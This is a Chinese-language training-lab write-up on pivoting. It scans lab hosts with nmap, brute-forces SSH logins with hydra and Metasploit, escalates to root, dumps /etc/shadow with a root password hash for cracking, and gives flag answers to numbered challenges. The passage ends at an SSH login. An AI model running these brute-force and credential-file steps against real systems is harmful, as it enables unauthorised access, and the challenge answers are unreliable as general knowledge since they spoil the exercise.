Pivoting & Double Pivoting
網路架構如下:
題目如下:
先從攻擊機掃172.16.65網段,看現在可以打哪一些:
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# nmap -F 172.16.65.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 02:29 EDT
Nmap scan report for 172.16.65.200
Host is up (0.057s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap scan report for 172.16.65.210
Host is up (0.053s latency).
Not shown: 92 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
8080/tcp open http-proxy
8081/tcp open blackice-icecap
Nmap done: 256 IP addresses (2 hosts up) scanned in 33.71 seconds
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# nmap -p- 172.16.65.200 172.16.65.210
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 03:53 EDT
Nmap scan report for 172.16.65.200
Host is up (0.053s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap scan report for 172.16.65.210
Host is up (0.051s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
5001/tcp open commplex-link
8080/tcp open http-proxy
8081/tcp open blackice-icecap
Nmap done: 2 IP addresses (2 hosts up) scanned in 55.62 seconds
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# nmap -p22 172.16.65.200 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 03:55 EDT
Nmap scan report for 172.16.65.200
Host is up (0.014s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 a7845ddf10e6d2f8665038ccbd37ee5e (RSA)
| 256 bde062be09d541b852c406babcf8f85d (ECDSA)
|_ 256 e046b4eecf21baefd937a2c3623fd406 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.10 - 3.16 (93%), Linux 3.16 (92%), Linux 3.13 (90%), Linux 3.18 (90%), Linux 4.0 (90%), Linux 3.10 - 4.11 (89%), Linux 3.12 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 63.40 ms 192.168.200.1
2 12.34 ms 172.16.65.200
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.17 seconds
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# nmap -p22,80,139,143,443,445,5001,8080,8081 172.16.65.200 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 03:56 EDT
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# nmap -p22,80,139,143,443,445,5001,8080,8081 172.16.65.210 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 03:56 EDT
Nmap scan report for 172.16.65.210
Host is up (0.017s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 ea831e455aa68c431c3ce318ddfc88a5 (DSA)
|_ 2048 3a94d83fe0a27ab8c394d75e00550ca7 (RSA)
80/tcp open http Apache httpd 2.2.14 ((Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL...)
|_http-server-header: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: owaspbwa OWASP Broken Web Applications
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Courier Imapd (released 2008)
|_imap-capabilities: UIDPLUS completed CHILDREN SORT ACL2=UNIONA0001 IMAP4rev1 OK CAPABILITY QUOTA NAMESPACE THREAD=REFERENCES IDLE ACL THREAD=ORDEREDSUBJECT
443/tcp open ssl/http Apache httpd 2.2.14 ((Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL...)
|_http-title: owaspbwa OWASP Broken Web Applications
|_http-server-header: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
| ssl-cert: Subject: commonName=owaspbwa
| Not valid before: 2013-01-02T21:12:38
|_Not valid after: 2022-12-31T21:12:38
|_ssl-date: 2021-12-24T17:14:12+00:00; -1y92d14h43m21s from scanner time.
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
5001/tcp open java-object Java Object Serialization
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Site doesn't have a title.
8081/tcp open http Jetty 6.1.25
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Jetty(6.1.25)
|_http-title: Choose Your Path
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5001-TCP:V=7.93%I=7%D=3/27%Time=64214C30%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4,"\xac\xed\0\x05");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), HP MSM410 WAP (94%), Linux 2.6.35 (94%), Linux 2.6.32 (93%), IGEL UD3 thin client (Linux 2.6) (93%), Kyocera CopyStar CS-2560 printer (91%), IPFire 2.11 firewall (Linux 2.6.32) (91%), DD-WRT v24-sp1 (Linux 2.4) (90%), Fortinet FortiOS 5.0.6 (90%), Linux 2.6.31 - 2.6.32 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: OWASPBWA, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
|_clock-skew: mean: -457d14h43m21s, deviation: 0s, median: -457d14h43m21s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 64.14 ms 192.168.200.1
2 12.79 ms 172.16.65.210
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.88 seconds
有200跟210可以打,先去爆破200的密碼,200相關問題如下:
2 (Challenge 41) What is the last four hex digits of the RSA ssh-hostkey at machine 192.168.65.200? (Hint: do not enter the colon, just characters)
在剛剛的nmap即可看到答案(如下圖紅字處),只是選項沒有:
3 (Challenge 42) What is the root password of the user at the machine located at the IP address of 192.168.65.200?
7 (Challenge 46) Compromise the 192.168.65.200 machine to gain user level access. Locate userflag.txt and submit the last 6 hex digits of the md5 hash of the file.
8 (Challenge 47) Escalate your privilege to that of a root user in the 192.168.65.200 machine, locate rootflag.txt and enter the last 6 digits of the md5 hash.
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt ssh://172.16.65.200 -u -t 4
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-27 04:21:45
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1820 login tries (l:35/p:52), ~455 tries per task
[DATA] attacking ssh://172.16.65.200:22/
[STATUS] 102.00 tries/min, 102 tries in 00:01h, 1718 to do in 00:17h, 4 active
[STATUS] 100.00 tries/min, 300 tries in 00:03h, 1520 to do in 00:16h, 4 active
[STATUS] 102.43 tries/min, 717 tries in 00:07h, 1103 to do in 00:11h, 4 active
[22][ssh] host: 172.16.65.200 login: vagrant password: vagrant
[STATUS] 102.42 tries/min, 1229 tries in 00:12h, 591 to do in 00:06h, 4 active
[ERROR] all children were disabled due too many connection errors
0 of 1 target successfully completed, 1 valid password found
[INFO] Writing restore file because 2 server scans could not be completed
[ERROR] 1 target was disabled because of too many errors
[ERROR] 1 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-27 04:36:22
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# ssh vagrant@172.16.65.200
The authenticity of host '172.16.65.200 (172.16.65.200)' can't be established.
ED25519 key fingerprint is SHA256:kQnxNmQcFEtAI9kwyBD1IU8dyoimM1dOekdUrkjIrGM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.16.65.200' (ED25519) to the list of known hosts.
vagrant@172.16.65.200's password:
Linux debian-9 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 23 18:29:18 2021 from 172.16.0.1
vagrant@debian-9:~$
用vagrant/vagrant登入一般user權限
3 (Challenge 42) What is the root password of the user at the machine located at the IP address of 192.168.65.200?
A. puppettwo B. aspentwo C. cpentwo D. lpttwo
vagrant@debian-9:~$ su root
Password:
root@debian-9:/home/vagrant#
第三題已給出可能密碼,root的密碼其實只要用第三題4個選項去try就可以,是puppettwo。
總之,用ssh登進去後就可以拿userflag:
vagrant@debian-9:~$ cd /
vagrant@debian-9:/$ find -name userflag.txt -print 2>/dev/null
./home/allocamelus/userflag.txt
vagrant@debian-9:/$ cat ./home/allocamelus/userflag.txt
PivotingUser-2341
vagrant@debian-9:/$ md5sum ./home/allocamelus/userflag.txt
31a46a50bb1f32455cc1328246078910 ./home/allocamelus/userflag.txt
7 (Challenge 46) Compromise the 192.168.65.200 machine to gain user level access. Locate userflag.txt and submit the last 6 hex digits of the md5 hash of the file.
Ans: 078910
8.Challenge 47: (60 Points)
Escalate your privilege to that of a root user in the 192.168.65.200 machine, locate rootflag.txt and enter the last 6 digits of the md5 hash.
Ans: c67f46,操作方式如下,密碼已在題目中洩露:
┌──(root㉿kali)-[~]
└─# ssh vagrant@172.16.65.200
vagrant@172.16.65.200's password:
Linux debian-9 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 1 06:12:01 2023 from 127.0.0.1
vagrant@debian-9:~$ su -
Password:
root@debian-9:~# find / -name *rootflag* -print 2>/dev/null
/opt/rootflag.txt
root@debian-9:~# cat /opt/rootflag.txt
PivotingRoot-2021
root@debian-9:~# md5sum /opt/rootflag.txt
942f71b657262b347180c8d4cbc67f46 /opt/rootflag.txt
也可以乖乖猜root密碼:
vagrant@debian-9:~$ cat /etc/shadow
root:$6$BU2esXP6$8fM3pLf7YocOVHINVaJSlv98vwG8jXW1MmtIzIvpCfLXqmSsaNx44dtHb7TZH59uxSGuLt71MIJE8sA.JxneU1:18756:0:99999:7:::
daemon:*:18984:0:99999:7:::
bin:*:18984:0:99999:7:::
sys:*:18984:0:99999:7:::
sync:*:18984:0:99999:7:::
games:*:18984:0:99999:7:::
man:*:18984:0:99999:7:::
lp:*:18984:0:99999:7:::
mail:*:18984:0:99999:7:::
news:*:18984:0:99999:7:::
uucp:*:18984:0:99999:7:::
proxy:*:18984:0:99999:7:::
www-data:*:18984:0:99999:7:::
backup:*:18984:0:99999:7:::
list:*:18984:0:99999:7:::
irc:*:18984:0:99999:7:::
gnats:*:18984:0:99999:7:::
nobody:*:18984:0:99999:7:::
systemd-timesync:*:18984:0:99999:7:::
systemd-network:*:18984:0:99999:7:::
systemd-resolve:*:18984:0:99999:7:::
systemd-bus-proxy:*:18984:0:99999:7:::
_apt:*:18984:0:99999:7:::
Debian-exim:!:18985:0:99999:7:::
dnsmasq:*:18985:0:99999:7:::
messagebus:*:18985:0:99999:7:::
usbmux:*:18985:0:99999:7:::
geoclue:*:18985:0:99999:7:::
speech-dispatcher:!:18985:0:99999:7:::
sshd:*:18985:0:99999:7:::
rtkit:*:18985:0:99999:7:::
pulse:*:18985:0:99999:7:::
avahi:*:18985:0:99999:7:::
colord:*:18985:0:99999:7:::
saned:*:18985:0:99999:7:::
Debian-gdm:*:18985:0:99999:7:::
hplip:*:18985:0:99999:7:::
vagrant:$6$9y.sCqXj$NX4hncJc3.6ESlQlnu1qWvSSpE8XDShuaGleVX2XEOWHkz3bslLe24r68/OlD3YFJiBx3rDBNSDiLlSsEpLec1:18985:0:99999:7:::
可以用john去猜root:$6$BU2esXP6$8fM3pLf7YocOVHINVaJSlv98vwG8jXW1MmtIzIvpCfLXqmSsaNx44dtHb7TZH59uxSGuLt71MIJE8sA.JxneU1:18756:0:99999:7:::這一段來獲得root密碼。
現在打210:
10 (Challenge 49) What is the last 4 hex digits of the 1024 DSA ssh key at 192.168.65.210?
11 (Challenge 50) What is the last 6 hex digits of the md5 hash content of rootflag.txt on 192.168.65.210?
12 (Challenge 51) What is the last 6 hex digits of the hash content of the userflag.txt on machine 192.168.65.210?
第10題在nmap已有答案如下圖紅線處,88a5。
總之,210有開22 port就先猜密碼:
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt ssh://172.16.65.210 -u
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-27 04:12:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1820 login tries (l:35/p:52), ~114 tries per task
[DATA] attacking ssh://172.16.65.210:22/
[ERROR] could not connect to ssh://172.16.65.210:22 - kex error : no match for method server host key algo: server [ssh-rsa,ssh-dss], client [ssh-ed25519,ecdsa-sha2-nistp521,ecdsa-sha2-nistp384,ecdsa-sha2-nistp256,rsa-sha2-512,rsa-sha2-256]
發現噴錯,新增一下演算法,要改ssh的部分:
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# cd
┌──(root㉿kali)-[~]
└─# cd .ssh
┌──(root㉿kali)-[~/.ssh]
└─# ls
known_hosts known_hosts.old
┌──(root㉿kali)-[~/.ssh]
└─# vim config
打完以上指令,新增config檔,並新增內容如下:
用metasploit裡的工具來重新爆破密碼:
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# msfconsole
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
=[ metasploit v6.3.2-dev ]
+ -- --=[ 2290 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Search can apply complex filters such as
search cve:2009 type:exploit, see all the filters
with help search
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search ssh
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/alienvault_exec 2017-01-31 excellent Yes AlienVault OSSIM/USM Remote Code Execution
1 auxiliary/scanner/ssh/apache_karaf_command_execution 2016-02-09 normal No Apache Karaf Default Credentials Command Execution
2 auxiliary/scanner/ssh/karaf_login normal No Apache Karaf Login Utility
3 exploit/apple_ios/ssh/cydia_default_ssh 2007-07-02 excellent No Apple iOS Default SSH Password Vulnerability
4 exploit/unix/ssh/arista_tacplus_shell 2020-02-02 great Yes Arista restricted shell escape (with privesc)
5 exploit/unix/ssh/array_vxag_vapv_privkey_privesc 2014-02-03 excellent No Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution
6 exploit/linux/ssh/ceragon_fibeair_known_privkey 2015-04-01 excellent No Ceragon FibeAir IP-10 SSH Private Key Exposure
7 auxiliary/scanner/ssh/cerberus_sftp_enumusers 2014-05-27 normal No Cerberus FTP Server SFTP Username Enumeration
8 auxiliary/dos/cisco/cisco_7937g_dos 2020-06-02 normal No Cisco 7937G Denial-of-Service Attack
9 auxiliary/admin/http/cisco_7937g_ssh_privesc 2020-06-02 normal No Cisco 7937G SSH Privilege Escalation
10 exploit/linux/http/cisco_asax_sfr_rce 2022-06-22 excellent Yes Cisco ASA-X with FirePOWER Services Authenticated Command Injection
11 auxiliary/scanner/http/cisco_firepower_login normal No Cisco Firepower Management Console 6.0 Login
12 exploit/linux/ssh/cisco_ucs_scpuser 2019-08-21 excellent No Cisco UCS Director default scpuser password
13 auxiliary/scanner/ssh/eaton_xpert_backdoor 2018-07-18 normal No Eaton Xpert Meter SSH Private Key Exposure Scanner
14 exploit/linux/ssh/exagrid_known_privkey 2016-04-07 excellent No ExaGrid Known SSH Key and Default Password
15 exploit/linux/ssh/f5_bigip_known_privkey 2012-06-11 excellent No F5 BIG-IP SSH Private Key Exposure
16 exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684 2022-10-10 excellent Yes Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.
17 auxiliary/scanner/ssh/fortinet_backdoor 2016-01-09 normal No Fortinet SSH Backdoor Scanner
18 post/windows/manage/forward_pageant normal No Forward SSH Agent Requests To Remote Pageant
19 exploit/windows/ssh/freeftpd_key_exchange 2006-05-12 average No FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
20 exploit/windows/ssh/freesshd_key_exchange 2006-05-12 average No FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
21 exploit/windows/ssh/freesshd_authbypass 2010-08-11 excellent Yes Freesshd Authentication Bypass
22 auxiliary/scanner/http/gitlab_user_enum 2014-11-21 normal No GitLab User Enumeration
23 exploit/multi/http/gitlab_shell_exec 2013-11-04 excellent Yes Gitlab-shell Code Execution
24 exploit/linux/ssh/ibm_drm_a3user 2020-04-21 excellent No IBM Data Risk Manager a3user Default Password
25 post/windows/manage/install_ssh normal No Install OpenSSH for Windows
26 payload/generic/ssh/interact normal No Interact with Established SSH Connection
27 post/multi/gather/jenkins_gather normal No Jenkins Credential Collector
28 auxiliary/scanner/ssh/juniper_backdoor 2015-12-20 normal No Juniper SSH Backdoor Scanner
29 auxiliary/scanner/ssh/detect_kippo normal No Kippo SSH Honeypot Detector
30 post/linux/gather/enum_network normal No Linux Gather Network Information
31 exploit/linux/local/ptrace_traceme_pkexec_helper 2019-07-04 excellent Yes Linux Polkit pkexec helper PTRACE_TRACEME local root exploit
32 exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey 2014-03-17 excellent No Loadbalancer.org Enterprise VA SSH Private Key Exposure
33 exploit/multi/http/git_submodule_command_exec 2017-08-10 excellent No Malicious Git HTTP Server For CVE-2017-1000117
34 exploit/linux/ssh/mercurial_ssh_exec 2017-04-18 excellent No Mercurial Custom hg-ssh Wrapper Remote Code Exec
35 exploit/linux/ssh/microfocus_obr_shrboadmin 2020-09-21 excellent No Micro Focus Operations Bridge Reporter shrboadmin default password
36 post/multi/gather/ssh_creds normal No Multi Gather OpenSSH PKI Credentials Collection
37 exploit/solaris/ssh/pam_username_bof 2020-10-20 normal Yes Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow
38 exploit/windows/ssh/putty_msg_debug 2002-12-16 normal No PuTTY Buffer Overflow
39 post/windows/gather/enum_putty_saved_sessions normal No PuTTY Saved Sessions Enumeration Module
40 auxiliary/gather/qnap_lfi 2019-11-25 normal Yes QNAP QTS and Photo Station Local File Inclusion
41 exploit/linux/ssh/quantum_dxi_known_privkey 2014-03-17 excellent No Quantum DXi V1000 SSH Private Key Exposure
42 exploit/linux/ssh/quantum_vmpro_backdoor 2014-03-17 excellent No Quantum vmPRO Backdoor Command
43 auxiliary/fuzzers/ssh/ssh_version_15 normal No SSH 1.5 Version Fuzzer
44 auxiliary/fuzzers/ssh/ssh_version_2 normal No SSH 2.0 Version Fuzzer
45 auxiliary/fuzzers/ssh/ssh_kexinit_corrupt normal No SSH Key Exchange Init Corruption
46 post/linux/manage/sshkey_persistence excellent No SSH Key Persistence
47 post/windows/manage/sshkey_persistence good No SSH Key Persistence
48 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
49 auxiliary/scanner/ssh/ssh_identify_pubkeys normal No SSH Public Key Acceptance Scanner
50 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
51 exploit/multi/ssh/sshexec 1999-01-01 manual No SSH User Code Execution
52 auxiliary/scanner/ssh/ssh_enumusers normal No SSH Username Enumeration
53 auxiliary/fuzzers/ssh/ssh_version_corrupt normal No SSH Version Corruption
54 auxiliary/scanner/ssh/ssh_version normal No SSH Version Scanner
55 post/multi/gather/saltstack_salt normal No SaltStack Salt Information Gatherer
56 exploit/unix/http/schneider_electric_net55xx_encoder 2019-01-25 excellent Yes Schneider Electric Pelco Endura NET55XX Encoder
57 exploit/windows/ssh/securecrt_ssh1 2002-07-23 average No SecureCRT SSH1 Buffer Overflow
58 exploit/linux/ssh/solarwinds_lem_exec 2017-03-17 excellent No SolarWinds LEM Default SSH Password Remote Code Execution
59 exploit/linux/http/sourcegraph_gitserver_sshcmd 2022-02-18 excellent Yes Sourcegraph gitserver sshCommand RCE
60 exploit/linux/ssh/symantec_smg_ssh 2012-08-27 excellent No Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability
61 exploit/linux/http/symantec_messaging_gateway_exec 2017-04-26 excellent No Symantec Messaging Gateway Remote Code Execution
62 exploit/windows/ssh/sysax_ssh_username 2012-02-27 normal Yes Sysax 5.53 SSH Username Buffer Overflow
63 auxiliary/dos/windows/ssh/sysax_sshd_kexchange 2013-03-17 normal No Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service
64 exploit/unix/ssh/tectia_passwd_changereq 2012-12-01 excellent Yes Tectia SSH USERAUTH Change Request Password Reset Vulnerability
65 auxiliary/scanner/ssh/ssh_enum_git_keys normal No Test SSH Github Access
66 exploit/linux/http/ubiquiti_airos_file_upload 2016-02-13 excellent No Ubiquiti airOS Arbitrary File Upload
67 payload/cmd/unix/reverse_ssh normal No Unix Command Shell, Reverse TCP SSH
68 exploit/linux/ssh/vmware_vdp_known_privkey 2016-12-20 excellent No VMware VDP Known SSH Key
69 exploit/multi/http/vmware_vcenter_uploadova_rce 2021-02-23 manual Yes VMware vCenter Server Unauthenticated OVA File Upload RCE
70 exploit/linux/ssh/vyos_restricted_shell_privesc 2018-11-05 great Yes VyOS restricted-shell Escape and Privilege Escalation
71 post/windows/gather/credentials/mremote normal No Windows Gather mRemote Saved Password Extraction
72 exploit/windows/local/unquoted_service_path 2001-10-25 excellent Yes Windows Unquoted Service Path Privilege Escalation
73 auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal No libssh Authentication Bypass Scanner
74 exploit/linux/http/php_imap_open_rce 2018-10-23 good Yes php imap_open Remote Code Execution
Interact with a module by name or index. For example info 74, use 74 or use exploit/linux/http/php_imap_open_rce
msf6 >
值得關注的是第48個ssh_login,可以猜ssh密碼:
msf6 > use 48
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the cu
rrent database
DB_ALL_PASS false no Add all passwords in the current database to t
he list
DB_ALL_USERS false no Add all users in the current database to the l
ist
DB_SKIP_EXISTING none no Skip existing credentials stored in the curren
t database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://docs.metasploi
t.com/docs/using-metasploit/basics/using-metas
ploit.html
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a ho
st
THREADS 1 yes The number of concurrent threads (max one per
host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated
by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file /home/kali/LPT_day2/Usernames-CPENT.txt
user_file => /home/kali/LPT_day2/Usernames-CPENT.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /home/kali/LPT_day2/Passwords-CPENT.txt
pass_file => /home/kali/LPT_day2/Passwords-CPENT.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.16.65.210
rhosts => 172.16.65.210
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored i
n the current database
DB_ALL_PASS false no Add all passwords in the current datab
ase to the list
DB_ALL_USERS false no Add all users in the current database
to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in th
e current database (Accepted: none, us
er, user&realm)
PASSWORD no A specific password to authenticate wi
th
PASS_FILE /home/kali/LPT_day2/Pas no File containing passwords, one per lin
swords-CPENT.txt e
RHOSTS 172.16.65.210 yes The target host(s), see https://docs.m
etasploit.com/docs/using-metasploit/ba
sics/using-metasploit.html
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works
for a host
THREADS 1 yes The number of concurrent threads (max
one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords se
parated by space, one pair per line
USER_AS_PASS false no Try the username as the password for a
ll users
USER_FILE /home/kali/LPT_day2/Use no File containing usernames, one per lin
rnames-CPENT.txt e
VERBOSE false yes Whether to print output for all attemp
ts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 172.16.65.210:22 - Starting bruteforce
[+] 172.16.65.210:22 - Success: 'kevin:Pa$$w0rd123' 'uid=1001(kevin) gid=1002(kevin) groups=1002(kevin) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
即使hydra因為加密演算法的關係不能用,也能用上述方式來爆破ssh密碼。接下來用猜出來的密碼,從攻擊機用ssh登入:
┌──(root㉿kali)-[~]
└─# ssh kevin@172.16.65.210
